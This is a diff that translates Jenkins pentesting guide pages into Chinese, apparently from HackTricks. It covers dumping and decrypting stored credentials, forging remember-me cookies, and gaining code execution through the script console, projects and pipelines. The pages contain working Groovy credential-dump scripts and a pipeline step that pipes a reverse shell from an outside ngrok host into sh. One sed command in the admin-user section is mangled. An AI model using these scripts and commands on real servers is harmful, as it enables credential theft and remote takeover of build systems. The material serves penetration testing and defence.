+## 任意文件读取到 RCE
{{#ref}}
jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -326,19 +306,17 @@ jenkins-rce-creating-modifying-project.md
jenkins-rce-creating-modifying-pipeline.md
{{#endref}}
-## Post Exploitation
+## 后期利用
### Metasploit
-
```
msf> post/multi/gather/jenkins_gather
```
-
### Jenkins Secrets
-You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
+您可以通过访问 `/credentials/` 列出秘密,如果您拥有足够的权限。请注意,这只会列出 `credentials.xml` 文件中的秘密,但 **构建配置文件** 可能还有 **更多凭据**。
-If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**.
+如果您可以 **查看每个项目的配置**,您也可以在其中看到用于访问存储库的 **凭据名称(秘密)** 和 **项目的其他凭据**。
.png>)
@@ -350,19 +328,18 @@ jenkins-dumping-secrets-from-groovy.md
#### From disk
-These files are needed to **decrypt Jenkins secrets**:
+这些文件用于 **解密 Jenkins 秘密**:
- secrets/master.key
- secrets/hudson.util.Secret
-Such **secrets can usually be found in**:
+这样的 **秘密通常可以在**:
- credentials.xml
- jobs/.../build.xml
- jobs/.../config.xml
-Here's a regex to find them:
-
+这是一个用于查找它们的正则表达式:
```bash
# Find the secrets
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
@@ -372,11 +349,9 @@ grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
# Secret example
credentials.xml: {AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}
```
+#### 离线解密Jenkins秘密
-#### Decrypt Jenkins secrets offline
-
-If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**.
-
+如果您已经转储了 **解密秘密所需的密码**,请使用 [**这个脚本**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **来解密这些秘密**。
```bash
python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
06165DF2-C047-4402-8CAB-1C8EC526C115
@@ -384,23 +359,20 @@ python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT
```
-
-#### Decrypt Jenkins secrets from Groovy
-
+#### 从 Groovy 解密 Jenkins 秘密
```bash
println(hudson.util.Secret.decrypt("{...}"))
```
+### 创建新管理员用户
-### Create new admin user
+1. 访问 Jenkins config.xml 文件在 `/var/lib/jenkins/config.xml` 或 `C:\Program Files (x86)\Jenkins\`
+2. 搜索词 `true` 并将 **`true`** 改为 **`false`**。
+1. `sed -i -e 's/truefalsetrue` 再次 **启用** **安全性**,并 **再次重启 Jenkins**。
-1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\`
-2. Search for the word `true`and change the word \*\*`true` \*\* to **`false`**.
- 1. `sed -i -e 's/truefalsetrue` and **restart the Jenkins again**.
-
-## References
+## 参考文献
- [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins)
- [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
@@ -410,7 +382,3 @@ println(hudson.util.Secret.decrypt("{...}"))
- [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
index 6e62a8536..87e50d856 100644
--- a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
+++ b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
@@ -6,48 +6,48 @@
### Username + Password
-The most common way to login in Jenkins if with a username or a password
+在Jenkins中登录的最常见方式是使用用户名或密码。
### Cookie
-If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen).
+如果**授权的cookie被盗取**,它可以用于访问用户的会话。该cookie通常被称为`JSESSIONID.*`。(用户可以终止所有会话,但他需要首先发现cookie被盗取)。
### SSO/Plugins
-Jenkins can be configured using plugins to be **accessible via third party SSO**.
+Jenkins可以通过插件配置为**通过第三方SSO访问**。
### Tokens
-**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API.
+**用户可以生成令牌**以允许应用程序通过CLI或REST API冒充他们。
### SSH Keys
-This component provides a built-in SSH server for Jenkins. It’s an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/))
+该组件为Jenkins提供了内置的SSH服务器。这是[Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/)的替代接口,可以使用任何SSH客户端以这种方式调用命令。(来自[docs](https://plugins.jenkins.io/sshd/))
## Authorization
-In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options:
+在`/configureSecurity`中,可以**配置Jenkins的授权方法**。有几种选项:
-- **Anyone can do anything**: Even anonymous access can administrate the server
-- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
-- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
-- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
+- **任何人都可以做任何事**:甚至匿名访问也可以管理服务器。
+- **遗留模式**:与Jenkins <1.164相同。如果您拥有**“admin”角色**,您将获得**对系统的完全控制**,否则(包括**匿名**用户)您将只有**读取**权限。
+- **登录用户可以做任何事**:在此模式下,每个**登录用户获得Jenkins的完全控制**。唯一没有完全控制的用户是**匿名用户**,他们只有**读取权限**。
+- **基于矩阵的安全性**:您可以在表中配置**谁可以做什么**。每个**列**代表一个**权限**。每个**行**代表一个**用户或组/角色**。这包括一个特殊用户'**anonymous**',代表**未认证用户**,以及'**authenticated**',代表**所有已认证用户**。
.png>)
-- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
-- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
+- **基于项目的矩阵授权策略**:此模式是对“**基于矩阵的安全性**”的**扩展**,允许为每个项目单独**定义额外的ACL矩阵**。
+- **基于角色的策略**:允许使用**基于角色的策略**定义授权。在`/role-strategy`中管理角色。
## **Security Realm**
-In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms:
+在`/configureSecurity`中,可以**配置安全领域**。默认情况下,Jenkins支持几种不同的安全领域:
-- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
-- **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
-- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
-- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
+- **委托给servlet容器**:用于**委托认证给运行Jenkins控制器的servlet容器**,例如[Jetty](https://www.eclipse.org/jetty/)。
+- **Jenkins自己的用户数据库**:使用**Jenkins自己的内置用户数据存储**进行认证,而不是委托给外部系统。默认启用。
+- **LDAP**:将所有认证委托给配置的LDAP服务器,包括用户和组。
+- **Unix用户/组数据库**:**将认证委托给Jenkins控制器上的底层Unix**操作系统级用户数据库。此模式还允许重用Unix组进行授权。
-Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as:
+插件可以提供额外的安全领域,这可能对将Jenkins纳入现有身份系统有用,例如:
- [Active Directory](https://plugins.jenkins.io/active-directory)
- [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
@@ -55,31 +55,31 @@ Plugins can provide additional security realms which may be useful for incorpora
## Jenkins Nodes, Agents & Executors
-Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/):
+来自[docs](https://www.jenkins.io/doc/book/managing/nodes/)的定义:
-**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold.
+**节点**是**构建代理运行的机器**。Jenkins监控每个附加节点的磁盘空间、可用临时空间、可用交换空间、时钟时间/同步和响应时间。如果这些值中的任何一个超出配置的阈值,则节点将被下线。
-**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine.
+**代理**代表Jenkins控制器**管理任务执行**,通过**使用执行器**。代理可以使用任何支持Java的操作系统。构建和测试所需的工具安装在代理运行的节点上;它们可以**直接安装或在容器中安装**(Docker或Kubernetes)。每个**代理实际上是主机上的一个进程,具有自己的PID**。
-An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time.
+**执行器**是**任务执行的插槽**;实际上,它是**代理中的一个线程**。节点上的**执行器数量**定义了可以在该节点上同时执行的**并发任务**的数量。换句话说,这决定了可以在该节点上同时执行的**并发Pipeline `stages`**的数量。
## Jenkins Secrets
### Encryption of Secrets and Credentials
-Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include:
+来自[docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)的定义:Jenkins使用**AES加密和保护秘密**、凭据及其各自的加密密钥。这些加密密钥存储在`$JENKINS_HOME/secrets/`中,以及用于保护这些密钥的主密钥。该目录应配置为仅允许Jenkins控制器运行的操作系统用户具有对该目录的读写访问(即,`chmod`值为`0700`或使用适当的文件属性)。**主密钥**(有时在密码术语中称为“密钥加密密钥”)是**以\_未加密\_形式存储在Jenkins控制器文件系统中的**`$JENKINS_HOME/secrets/master.key`**,这并不能保护直接访问该文件的攻击者。大多数用户和开发人员将通过[Secret](https://javadoc.jenkins.io/byShortName/Secret) API间接使用这些加密密钥,以加密通用秘密数据或通过凭据API。对于对密码学感兴趣的人,Jenkins在密码块链接(CBC)模式下使用AES,使用PKCS#5填充和随机IV加密存储在`$JENKINS_HOME/secrets/`中的[CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey)实例,文件名对应于其`CryptoConfidentialKey` id。常见的密钥id包括:
-- `hudson.util.Secret`: used for generic secrets;
-- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
-- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
+- `hudson.util.Secret`:用于通用秘密;
+- `com.cloudbees.plugins.credentials.SecretBytes.KEY`:用于某些凭据类型;
+- `jenkins.model.Jenkins.crumbSalt`:由[CSRF保护机制](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)使用;以及
### Credentials Access
-Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job//configure`) and therefore only accessible from the specific project.
+凭据可以**作用于全局提供者**(`/credentials/`),任何配置的项目都可以访问,或者可以作用于**特定项目**(`/job//configure`),因此仅可从特定项目访问。
-According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials.
+根据[**docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/):在作用域内的凭据可以无限制地提供给管道。为了**防止在构建日志中意外暴露**,凭据在常规输出中被**屏蔽**,因此调用`env`(Linux)或`set`(Windows),或打印其环境或参数的程序将**不会在构建日志中向本来无法访问凭据的用户显示它们**。
-**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.**
+**这就是为什么攻击者需要,例如,将凭据进行base64编码以提取凭据。**
## References
@@ -92,7 +92,3 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m
- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
index 9d2b232e1..445b50180 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -2,108 +2,104 @@
{{#include ../../banners/hacktricks-training.md}}
-In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
+在这篇博客文章中,可以找到将Jenkins中的本地文件包含漏洞转化为RCE的好方法:[https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
-This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own:
+这是一个AI生成的摘要,内容涉及如何利用任意cookie的构造来获取RCE,利用本地文件读取,直到我有时间自己创建摘要为止:
-### Attack Prerequisites
+### 攻击前提
-- **Feature Requirement:** "Remember me" must be enabled (default setting).
-- **Access Levels:** Attacker needs Overall/Read permissions.
-- **Secret Access:** Ability to read both binary and textual content from key files.
+- **功能要求:** “记住我”必须启用(默认设置)。
+- **访问级别:** 攻击者需要整体/读取权限。
+- **秘密访问:** 能够读取关键文件中的二进制和文本内容。
-### Detailed Exploitation Process
+### 详细利用过程
-#### Step 1: Data Collection
+#### 第一步:数据收集
-**User Information Retrieval**
+**用户信息检索**
-- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather:
- - **Username**
- - **User seed**
- - **Timestamp**
- - **Password hash**
+- 访问每个用户的用户配置和秘密,从`$JENKINS_HOME/users/*.xml`中收集:
+- **用户名**
+- **用户种子**
+- **时间戳**
+- **密码哈希**
-**Secret Key Extraction**
+**密钥提取**
-- Extract cryptographic keys used for signing the cookie:
- - **Secret Key:** `$JENKINS_HOME/secret.key`
- - **Master Key:** `$JENKINS_HOME/secrets/master.key`
- - **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
+- 提取用于签名cookie的加密密钥:
+- **秘密密钥:** `$JENKINS_HOME/secret.key`
+- **主密钥:** `$JENKINS_HOME/secrets/master.key`
+- **MAC密钥文件:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
-#### Step 2: Cookie Forging
+#### 第二步:Cookie伪造
-**Token Preparation**
+**令牌准备**
-- **Calculate Token Expiry Time:**
+- **计算令牌过期时间:**
- ```javascript
- tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time
- ```
+```javascript
+tokenExpiryTime = currentServerTimeInMillis() + 3600000 // 将当前时间加一小时
+```
-- **Concatenate Data for Token:**
+- **连接令牌数据:**
- ```javascript
- token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
- ```
+```javascript
+token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
+```
-**MAC Key Decryption**
+**MAC密钥解密**
-- **Decrypt MAC Key File:**
+- **解密MAC密钥文件:**
- ```javascript
- key = toAes128Key(masterKey) // Convert master key to AES128 key format
- decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file
- if not decrypted.hasSuffix("::::MAGIC::::")
- return ERROR;
- macKey = decrypted.withoutSuffix("::::MAGIC::::")
- ```
+```javascript
+key = toAes128Key(masterKey) // 将主密钥转换为AES128密钥格式
+decrypted = AES.decrypt(macFile, key) // 解密.mac文件
+if not decrypted.hasSuffix("::::MAGIC::::")
+return ERROR;
+macKey = decrypted.withoutSuffix("::::MAGIC::::")
+```
-**Signature Computation**
+**签名计算**
-- **Compute HMAC SHA256:**
+- **计算HMAC SHA256:**
- ```javascript
- mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key
- tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string
- ```
+```javascript
+mac = HmacSHA256(token, macKey) // 使用令牌和MAC密钥计算HMAC
+tokenSignature = bytesToHexString(mac) // 将MAC转换为十六进制字符串
+```
-**Cookie Encoding**
+**Cookie编码**
-- **Generate Final Cookie:**
+- **生成最终Cookie:**
- ```javascript
- cookie = base64.encode(
- username + ":" + tokenExpiryTime + ":" + tokenSignature
- ) // Base64 encode the cookie data
- ```
+```javascript
+cookie = base64.encode(
+username + ":" + tokenExpiryTime + ":" + tokenSignature
+) // Base64编码cookie数据
+```
-#### Step 3: Code Execution
+#### 第三步:代码执行
-**Session Authentication**
+**会话认证**
-- **Fetch CSRF and Session Tokens:**
- - Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`.
- - Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie.
+- **获取CSRF和会话令牌:**
+- 向`/crumbIssuer/api/json`发送请求以获取`Jenkins-Crumb`。
+- 从响应中捕获`JSESSIONID`,该ID将与记住我cookie一起使用。
-**Command Execution Request**
+**命令执行请求**
-- **Send a POST Request with Groovy Script:**
+- **发送带有Groovy脚本的POST请求:**
- ```bash
- curl -X POST "$JENKINS_URL/scriptText" \
- --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
- --header "Jenkins-Crumb: $CRUMB" \
- --header "Content-Type: application/x-www-form-urlencoded" \
- --data-urlencode "script=$SCRIPT"
- ```
+```bash
+curl -X POST "$JENKINS_URL/scriptText" \
+--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
+--header "Jenkins-Crumb: $CRUMB" \
+--header "Content-Type: application/x-www-form-urlencoded" \
+--data-urlencode "script=$SCRIPT"
+```
- - Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
+- Groovy脚本可用于在Jenkins环境中执行系统级命令或其他操作。
-The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely.
+提供的示例curl命令演示了如何使用必要的头和cookie向Jenkins发送请求,以安全地执行任意代码。
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
index 8699b8159..2da4bb0b5 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
@@ -3,10 +3,9 @@
{{#include ../../banners/hacktricks-training.md}}
> [!WARNING]
-> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
-
-You can **dump all the secrets from the Groovy Script console** in `/script` running this code
+> 请注意,这些脚本只会列出 `credentials.xml` 文件中的秘密,但 **构建配置文件** 可能也包含 **更多凭据**。
+您可以通过运行此代码在 `/script` 中 **从 Groovy 脚本控制台转储所有秘密**。
```java
// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
import jenkins.model.*
@@ -42,52 +41,45 @@ showRow("something else", it.id, '', '', '')
return
```
-
-#### or this one:
-
+#### 或者这个:
```java
import java.nio.charset.StandardCharsets;
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
- com.cloudbees.plugins.credentials.Credentials.class
+com.cloudbees.plugins.credentials.Credentials.class
)
for (c in creds) {
- println(c.id)
- if (c.properties.description) {
- println(" description: " + c.description)
- }
- if (c.properties.username) {
- println(" username: " + c.username)
- }
- if (c.properties.password) {
- println(" password: " + c.password)
- }
- if (c.properties.passphrase) {
- println(" passphrase: " + c.passphrase)
- }
- if (c.properties.secret) {
- println(" secret: " + c.secret)
- }
- if (c.properties.secretBytes) {
- println(" secretBytes: ")
- println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
- println("")
- }
- if (c.properties.privateKeySource) {
- println(" privateKey: " + c.getPrivateKey())
- }
- if (c.properties.apiToken) {
- println(" apiToken: " + c.apiToken)
- }
- if (c.properties.token) {
- println(" token: " + c.token)
- }
- println("")
+println(c.id)
+if (c.properties.description) {
+println(" description: " + c.description)
+}
+if (c.properties.username) {
+println(" username: " + c.username)
+}
+if (c.properties.password) {
+println(" password: " + c.password)
+}
+if (c.properties.passphrase) {
+println(" passphrase: " + c.passphrase)
+}
+if (c.properties.secret) {
+println(" secret: " + c.secret)
+}
+if (c.properties.secretBytes) {
+println(" secretBytes: ")
+println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
+println("")
+}
+if (c.properties.privateKeySource) {
+println(" privateKey: " + c.getPrivateKey())
+}
+if (c.properties.apiToken) {
+println(" apiToken: " + c.apiToken)
+}
+if (c.properties.token) {
+println(" token: " + c.token)
+}
+println("")
}
```
-
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
index 89ca15223..48a4f9952 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
@@ -1,43 +1,37 @@
-# Jenkins RCE Creating/Modifying Pipeline
+# Jenkins RCE 创建/修改管道
{{#include ../../banners/hacktricks-training.md}}
-## Creating a new Pipeline
+## 创建新管道
-In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
+在“新项目”(可在 `/view/all/newJob` 访问)中选择 **Pipeline:**
.png>)
-In the **Pipeline section** write the **reverse shell**:
+在 **Pipeline 部分** 中写入 **reverse shell**:
.png>)
-
```groovy
pipeline {
- agent any
+agent any
- stages {
- stage('Hello') {
- steps {
- sh '''
- curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
- '''
- }
- }
- }
+stages {
+stage('Hello') {
+steps {
+sh '''
+curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
+'''
+}
+}
+}
}
```
-
-Finally click on **Save**, and **Build Now** and the pipeline will be executed:
+最后点击 **Save**,然后 **Build Now**,管道将被执行:
.png>)
-## Modifying a Pipeline
+## 修改管道
-If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed.
+如果您可以访问某个已配置管道的配置文件,您可以直接 **修改它,附加您的反向 shell**,然后执行它或等待它被执行。
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
index f16096070..f1a0ee3cd 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
@@ -1,40 +1,36 @@
-# Jenkins RCE Creating/Modifying Project
+# Jenkins RCE 创建/修改项目
{{#include ../../banners/hacktricks-training.md}}
-## Creating a Project
+## 创建项目
-This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
+此方法非常嘈杂,因为您必须创建一个全新的项目(显然,这仅在您允许用户创建新项目时有效)。
-1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
-2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._
-3. Click **Build now**
- 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
- 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`**
+1. **创建一个新项目**(自由风格项目),点击“新建项目”或在 `/view/all/newJob`
+2. 在 **构建** 部分设置 **执行 shell**,并粘贴一个 powershell Empire 启动器或一个 meterpreter powershell(可以使用 _unicorn_ 获得)。使用 _PowerShell.exe_ 启动有效载荷,而不是使用 _powershell._
+3. 点击 **立即构建**
+1. 如果 **立即构建** 按钮没有出现,您仍然可以转到 **配置** --> **构建触发器** --> `定期构建` 并设置一个 cron 为 `* * * * *`
+2. 除了使用 cron,您还可以使用配置“**远程触发构建**”,您只需设置一个 api 令牌名称来触发作业。然后转到您的用户配置文件并 **生成一个 API 令牌**(将此 API 令牌称为您用于触发作业的 api 令牌)。最后,使用以下命令触发作业:**`curl :@/job//build?token=`**
.png>)
-## Modifying a Project
+## 修改项目
-Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
+转到项目并检查 **您是否可以配置任何** 项目(查找“配置按钮”):
.png>)
-If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others).
+如果您 **看不到任何** **配置** **按钮**,那么您 **可能无法** **配置** 它(但检查所有项目,因为您可能能够配置其中一些而不是其他项目)。
-Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
+或者 **尝试访问路径** `/job//configure` 或 `/me/my-views/view/all/job//configure` \_\_ 在每个项目中(示例:`/job/Project0/configure` 或 `/me/my-views/view/all/job/Project0/configure`)。
-## Execution
+## 执行
-If you are allowed to configure the project you can **make it execute commands when a build is successful**:
+如果您被允许配置项目,您可以 **使其在构建成功时执行命令**:
.png>)
-Click on **Save** and **build** the project and your **command will be executed**.\
-If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
+点击 **保存** 并 **构建** 项目,您的 **命令将被执行**。\
+如果您不是在执行反向 shell 而是一个简单命令,您可以 **在构建的输出中查看命令的输出**。
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
index 33821cc03..36e859144 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
@@ -4,24 +4,21 @@
## Jenkins RCE with Groovy Script
-This is less noisy than creating a new project in Jenkins
-
-1. Go to _path_jenkins/script_
-2. Inside the text box introduce the script
+这比在Jenkins中创建新项目要安静得多
+1. 转到 _path_jenkins/script_
+2. 在文本框中输入脚本
```python
def process = "PowerShell.exe ".execute()
println "Found text ${process.text}"
```
+您可以使用以下命令执行: `cmd.exe /c dir`
-You could execute a command using: `cmd.exe /c dir`
+在 **linux** 中,您可以这样做: **`"ls /".execute().text`**
-In **linux** you can do: **`"ls /".execute().text`**
-
-If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
-
-**Another useful groovy script** is (replace \[INSERT COMMAND]):
+如果您需要在文本中使用 _引号_ 和 _单引号_,可以使用 _"""PAYLOAD"""_(三重双引号)来执行有效载荷。
+**另一个有用的 groovy 脚本** 是(替换 \[INSERT COMMAND]):
```python
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
